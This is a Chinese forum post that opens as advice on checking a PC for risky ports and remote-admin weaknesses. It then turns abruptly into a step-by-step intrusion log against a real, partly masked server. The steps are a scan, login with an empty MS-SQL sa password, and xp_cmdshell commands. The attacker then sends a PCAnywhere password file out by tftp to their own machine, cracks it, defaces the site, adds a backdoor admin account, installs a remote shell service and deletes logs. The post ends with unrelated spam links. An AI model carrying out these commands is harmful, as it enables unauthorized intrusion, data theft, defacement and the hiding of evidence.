上网计算机查漏洞方法和相应处理 [复制链接]

上网计算机查漏洞方法和相应处理


如何给一台上网的机器查漏洞并做出相应的处理呢?
一、要命的端口
计算机要与外界进行通信，必须通过一些端口。别人要想入侵和控制我们的电脑，也要从某些端口连接进来。如果开放了139、445、 3389、4899等重要端口，要知道这些端口都可以为黑客入侵提供便利。尤其是4899，可能是入侵者安装的后门工具Radmin打开的，他可以通过这个端口取得系统的完全控制权。
在Windows 下，通过“开始”选取“运行”，然后输入“command” (Windows 2000/XP/2003下在“运行”中输入“cmd”)，进入命令提示窗口，然后输入netstat/an，就可以看到本机端口开放和网络连接情况。
那怎么关闭这些端口呢?因为计算机的每个端口都对应着某个服务或者应用程序，因此只要我们停止该服务或者卸载该程序，这些端口就自动关闭了。例如可以在“我的电脑 →控制面板→计算机管理→服务”中停止Radmin服务，就可以关闭4899端口了。
如果暂时没有找到打开某端口的服务或者停止该项服务可能会影响计算机的正常使用，我们也可以利用防火墙来屏蔽端口。
二、敌人的“进程”
在Windows 下，可以通过同时按下“Ctrl+Alt+Del”键调出任务管理器来查看和关闭进程；还可以通过系统自带的工具msinfo32看到，在“开始→运行”里输入msinfo32，打开“Microsoft 系统信息”界面，在“软件环境”的“正在运行任务”下可以看到本机的进程。
但目前很多木马进程都会伪装系统进程，新手朋友很难分辨其真伪，
三、小心，远程管理软件有大麻烦
现在很多人都喜欢在自己的机器上安装远程管理软件，如Pcanywhere、Radmin、VNC或者Windows自带的远程桌面，这确实方便了远程管理维护和办公，但同时远程管理软件也给我们带来了很多安全隐患。例如Pcanywhere 10.0版本及更早的版本存在着口令文件*.CIF容易被解密(解码而非爆破)的问题，一旦入侵者通过某种途径得到了*.CIF文件，他就可以用一款叫做Pcanywherepwd的工具破解出管理员账号和密码。
而Radmin则主要是空口令问题，因为Radmin默认为空口令，所以大多数人安装了Radmin之后，都忽略了口令安全设置，因此，任何一个攻击者都可以用Radmin客户端连接上安装了Radmin的机器，并做一切他想做的事情。
Windows系统自带的远程桌面也会给黑客入侵提供方便的大门，当然是在他通过一定的手段拿到了一个可以访问的账号之后。
可以说几乎每种远程管理软件都有它的问题，如强大的远程管理软件DameWare NT Utilitie。它工具包中的 DameWare Mini Remote Control某些版本也存在着缓冲区溢出漏洞，黑客可以利用这个漏洞在系统上执行任意指令。所以，要安全地远程使用它就要进行IP限制。
安装最新版的远程控制软件也有利于提高安全性，比如最新版的Pcanywhere的密码文件采用了较强的加密方案。
先ping出目标主机的IP地址：
连接IP主机: 211.154.xxx.xx...
发送 56 个字节...
接收到 56 个字节! 历时: 0毫秒
结论: IP主机正在与Internet连接中...
　　接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP，开始扫描。数分钟后得到扫描结果如下（结果经整理）：
主机信息
主机名:BEWDB01NOK
80(HTTP)
21(FTP Control)
25(SMTP)
443(HTTPS)
1433(MSSQL)
5631(PCAnyWhere)
用户列表
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin)
漏洞：
/\../readme.txt (HTTP: 200 )
/msadc/msadcs.dll (HTTP: 200 )
/iisadmpwd/achg.htr (HTTP: 200 )
/_AuthChangeUrl (HTTP: 200 )
/?PageServices (HTTP: 200 ) 　　上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看，
21(FTP Control)
1433(MSSQL)
5631(PCAnyWhere)
只有这三个可用。在万一得已的情况下，我是不会用@#$破ftp的。那么只好从
1433,5631这两个端口入手了！我们知道，1433是ms-sql的服务端口，默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点，没有给ＳＡ一个口令的话，事情就好办了！先来试试看。从www.tianxing.org下一个ms-sql的客户端，在Host框中输入目标ip:211.154.xxx.xx
Username为sa
password框空，连接：
SQL>Connecting 211.154.xxx.xx
SQL>Connected to 211.154.xxx.xx
　　呵呵！看来对方管理员没有对sa设置一个口令！太好了！可以在客户端以xp_cmdshell " "的形式运行任意dos指令了！dir一下试试看：
SQL>Command: xp_cmdshell "dir c:\"
驱动器 C 中的卷没有卷标。
卷的序列号是 5CBD-664C
卷的序列号是 5CBD-664C
c:\ 的目录
c:\ 的目录
01-12-20 08:13p 2u2u
01-07-23 08:10p 0 AUTOEXEC.BAT
01-11-28 04:02p 84 biaoti.txt
01-07-23 08:10p 0 CONFIG.SYS
01-11-22 11:49a InetPub
01-10-25 11:12a 15,360 kkkk.XLS
01-07-24 12:09p MSSQL7
01-12-12 11:00a 134,217,728 pagefile.sys
01-11-30 10:59a Program Files
01-09-04 02:43p 136 sp_attach.sql
01-12-20 04:12p temp
01-09-27 11:14a unzipped
01-12-15 12:09a WINNT
13 个文件 134,233,308 字节
54,232,576 字节可用
54,232,576 字节可用
这时我们便可以改对方的主页了！前提是先找到对方的web目录！来找找看
…………
ＸＸ分钟后，满头大汉，乖乖！竟然有Ｘ个盘，每个盘下又有ＸＸ个目录，这样找下去得何年何月？不成！要是有windows界面的形式就好找的多了！想想看，目标主机还开着5631端口，这正是pcanywhere远程管理端口呀！取了它的管理帐号和密码不就得了吗？不错的想法，呵呵……
默认情况下，pcanywhere安装于c:\Program Files目录下，其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件，就可以用一个叫pcanywherepwd的软件快速解出密码！
且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务：
选择“工具”菜单中的tftp服务器。设置一个默认根目录，点启动即可！
然后再用ms-sql客户端在目标服务器执行如下指令：
copy c:\progra~1\pcanywhere\data\New Caller.CIF c:\winnt\system32
tftp -i 本地ip　put New Caller.CIF
命令执行成功，这个cif文件已被传到本地tftp目录下了！
此时，用pcanywherepwd.exe破解此文件，得到用户名为：administrator
密码为：amsrepair
打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip：211.154.xxx.xx
选中login information项中的automatically login to host up connection
并在下面的login name和password栏中添入刚才得到的用户名和密码！确定即可。双击新建立的通道，稍等片刻即可看到了对方桌面。这下好搞了，呵呵～～在
g:\home\wwweb\目录下，终于找到了他们的index.htm。删！再手动定一个简单的文件:
修改主页完成。
该留个后门了，这是个NT主机，用小榕的RemoteNC做后门最好不过了！
先给系统加个超级用户，用ms-sql来做：
net user wing wing /add
net localgroup administrators wing /add
从对方桌面上打开ie连到小榕的站上下载RemoteNC，然后进入命令提示行状态,键入：
RemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provide Local CMD Redirect" 7 123456
系统显示：
[Install Service as RunasUser Mode]
Connecting 211.154.xxx.xx ..... Done.
Transffer File ..... Done.
Start Service ..... Done.
Now You can 211.154.xxx.xx to Connect, Have a Joy 安装成功
这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码：123456即可使用系统任何资源了！
接下来该清理战场了，在ms-sql下停掉对方的ftp和www服务：
net stop msftpsvc
net stop w3svc
删除c:\winnt\sys tem32\logfile下的所有文件。
再将服务恢复：
net start msftpsvc
net start w3svc


link：BSX穿孔复合吸声板 珍珠岩吸音板 大功率LED 铝矾土 高速公路交通安全设施 面粉机 基坑支护 房屋纠偏 仿真植物 注塑机螺杆 挤出机螺杆 雪松 弹性联轴器 膜片联轴器 甲酸 木门 楼梯 电加热器 公路护栏网 不锈钢管厂 变形缝 堆焊立磨煤磨 药芯焊丝